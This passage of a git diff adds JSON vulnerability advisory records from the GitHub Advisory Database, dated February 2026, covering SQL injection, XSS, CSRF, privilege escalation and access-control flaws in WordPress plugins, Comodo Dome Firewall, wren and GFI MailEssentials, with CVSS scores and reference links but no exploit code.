a/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json b/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json new file mode 100644 index 0000000000000..ab9a1a0019539 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vhgp-3x24-vh98/GHSA-vhgp-3x24-vh98.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhgp-3x24-vh98", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69295" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Coven Core coven-core allows Blind SQL Injection.This issue affects Coven Core: from n/a through <= 1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69295" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/coven-core/vulnerability/wordpress-coven-core-plugin-1-3-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vj38-w7p7-r367/GHSA-vj38-w7p7-r367.json b/advisories/unreviewed/2026/02/GHSA-vj38-w7p7-r367/GHSA-vj38-w7p7-r367.json new file mode 100644 index 0000000000000..3f77c58367bd6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vj38-w7p7-r367/GHSA-vj38-w7p7-r367.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj38-w7p7-r367", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25404" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input through admin management parameters. Attackers can inject script payloads in the admin_name, name, and surname parameters via POST requests to the /korugan/admins endpoint, which are stored and executed when administrators access the interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25404" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-stored-cross-site-scripting-via-admins" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjf2-j9mf-px53/GHSA-vjf2-j9mf-px53.json b/advisories/unreviewed/2026/02/GHSA-vjf2-j9mf-px53/GHSA-vjf2-j9mf-px53.json new file mode 100644 index 0000000000000..9a60d9adff3e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjf2-j9mf-px53/GHSA-vjf2-j9mf-px53.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjf2-j9mf-px53", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25378" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio AB Testing nelio-ab-testing allows Blind SQL Injection.This issue affects Nelio AB Testing: from n/a through <= 8.2.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25378" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nelio-ab-testing/vulnerability/wordpress-nelio-ab-testing-plugin-8-2-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json b/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json new file mode 100644 index 0000000000000..040c89dce81ae --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjq9-53r9-j2x9", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27532" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27532" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjqp-jjh4-4pp5/GHSA-vjqp-jjh4-4pp5.json b/advisories/unreviewed/2026/02/GHSA-vjqp-jjh4-4pp5/GHSA-vjqp-jjh4-4pp5.json new file mode 100644 index 0000000000000..396b0d51ce480 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjqp-jjh4-4pp5/GHSA-vjqp-jjh4-4pp5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjqp-jjh4-4pp5", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25337" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in wpcoachify Coachify coachify allows Cross Site Request Forgery.This issue affects Coachify: from n/a through <= 1.1.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25337" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/coachify/vulnerability/wordpress-coachify-theme-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json b/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json new file mode 100644 index 0000000000000..f27c8ffd51e51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjr6-wpqm-j5fj/GHSA-vjr6-wpqm-j5fj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjr6-wpqm-j5fj", + "modified": "2026-02-21T12:30:26Z", + "published": "2026-02-21T12:30:26Z", + "aliases": [ + "CVE-2026-1787" + ], + "details": "The LearnPress Export Import – WordPress extension for LearnPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'delete_migrated_data' function in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to delete course that have been migrated from Tutor LMS. The Tutor LMS plugin must be installed and activated in order to exploit the vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1787" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/learnpress-import-export/tags/4.1.0/inc/Migration/Controllers/TutorMigrationController.php#L55" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458589" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7bde915d-092a-452b-a0e0-ce5c2ce203dc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T11:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json new file mode 100644 index 0000000000000..e3a4eb2776bd6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjvc-9fxm-2xw8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69368" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes SOHO - Photography WordPress Theme soho allows DOM-Based XSS.This issue affects SOHO - Photography WordPress Theme: from n/a through <= 3.0.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soho/vulnerability/wordpress-soho-photography-wordpress-theme-theme-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjwf-9x67-fj96/GHSA-vjwf-9x67-fj96.json b/advisories/unreviewed/2026/02/GHSA-vjwf-9x67-fj96/GHSA-vjwf-9x67-fj96.json new file mode 100644 index 0000000000000..a003b4397b44e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjwf-9x67-fj96/GHSA-vjwf-9x67-fj96.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjwf-9x67-fj96", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25402" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted input to the username parameter. Attackers can send POST requests to the login endpoint with script payloads in the username field to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25402" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-cross-site-scripting-via-login" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjww-2j24-c357/GHSA-vjww-2j24-c357.json b/advisories/unreviewed/2026/02/GHSA-vjww-2j24-c357/GHSA-vjww-2j24-c357.json new file mode 100644 index 0000000000000..deee78eeb64eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjww-2j24-c357/GHSA-vjww-2j24-c357.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjww-2j24-c357", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13563" + ], + "details": "The Lizza LMS Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.3. This is due to the 'lizza_lms_pro_register_user_front_end' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13563" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/lizza-lms-education-wordpress-theme/51057780" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b113f475-3133-4ea3-9152-03bb84d79307?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json b/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json new file mode 100644 index 0000000000000..da10ca32f5bb8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm4c-6g35-79xf", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2026-2858" + ], + "details": "A vulnerability was identified in wren-lang wren up to 0.4.0. This affects the function peekChar of the file src/vm/wren_compiler.c of the component Source File Parser. Such manipulation leads to out-of-bounds read. The attack needs to be performed locally. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2858" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren/issues/1217" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i1217/repro" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347097" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347097" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754489" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T22:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json new file mode 100644 index 0000000000000..55d2bd16a9b2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmr8-g4h2-2x5j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2668" + ], + "details": "A vulnerability was found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. This affects an unknown function of the file /dm/dispatch/user/add of the component User Handler. The manipulation results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2668" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753283" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json new file mode 100644 index 0000000000000..54bad9bca322d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmwq-q997-3c46", + "modified": "2026-02-20T21:31:21Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22362" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Photolia photolia allows PHP Local File Inclusion.This issue affects Photolia: from n/a through <= 1.0.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22362" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/photolia/vulnerability/wordpress-photolia-theme-1-0-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json b/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json new file mode 100644 index 0000000000000..cc8061342f1f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp2m-r3pp-p859/GHSA-vp2m-r3pp-p859.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp2m-r3pp-p859", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69404" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeREX Extreme Store extremestore allows Object Injection.This issue affects Extreme Store: from n/a through <= 1.5.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69404" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/extremestore/vulnerability/wordpress-extreme-store-theme-1-5-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json b/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json new file mode 100644 index 0000000000000..f481da1a92ba1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp3m-qh4p-wg7c", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-0102" + ], + "details": "Under specific conditions, a malicious webpage may trigger autofill population after two consecutive taps, potentially without clear or intentional user consent. This could result in disclosure of stored autofill data such as addresses, email, or phone number metadata.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0102" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0102" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-359" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp99-6r6x-6v3c/GHSA-vp99-6r6x-6v3c.json b/advisories/unreviewed/2026/02/GHSA-vp99-6r6x-6v3c/GHSA-vp99-6r6x-6v3c.json new file mode 100644 index 0000000000000..76954873203a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp99-6r6x-6v3c/GHSA-vp99-6r6x-6v3c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp99-6r6x-6v3c", + "modified": "2026-02-19T21:30:47Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23620" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain an arbitrary file existence enumeration vulnerability in the ListServer.IsDBExist() web method exposed at /MailEssentials/pages/MailSecurity/ListServer.aspx/IsDBExist. An authenticated user can supply an unrestricted filesystem path via the JSON key \\\"path\\\", which is URL-decoded and passed to File.Exists(), allowing the attacker to determine whether arbitrary files exist on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23620" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-listserver-isdbexist-absolute-directory-traversal-to-file-enumeration" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json new file mode 100644 index 0000000000000..bf5b830a16403 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vph5-6p6f-8xpf", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68031" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in faraz sms افزونه پیامک حرفه ای فراز اس ام اس farazsms allows Reflected XSS.This issue affects افزونه پیامک حرفه ای فراز اس ام اس: from n/a through <= 2.7.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68031" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/farazsms/vulnerability/wordpress-fzonh-m-hrfh-fr-z-s-m-s-plugin-2-7-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vpw9-rw58-f7gh/GHSA-vpw9-rw58-f7gh.json b/advisories/unreviewed/2026/02/GHSA-vpw9-rw58-f7gh/GHSA-vpw9-rw58-f7gh.json new file mode 100644 index 0000000000000..321768a577a8e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vpw9-rw58-f7gh/GHSA-vpw9-rw58-f7gh.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vpw9-rw58-f7gh", + "modified": "2026-02-17T06:31:26Z", + "published": "2026-02-17T06:31:25Z", + "aliases": [ + "CVE-2026-2592" + ], + "details": "The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' failing to validate that the authority token provided in the callback URL belongs to the specific order being marked as paid. This makes it possible for unauthenticated attackers to potentially mark orders as paid without proper payment by reusing a valid authority token from a different transaction of the same amount.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2592" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L359" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L370" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L380" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L409" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/zarinpal-woocommerce-payment-gateway/trunk/class-wc-gateway-zarinpal.php#L412" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3445917" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e33fcd17-318b-408e-86bf-b4ece46121cc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json b/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json new file mode 100644 index 0000000000000..7ff2918c99944 --- /dev/null +++ 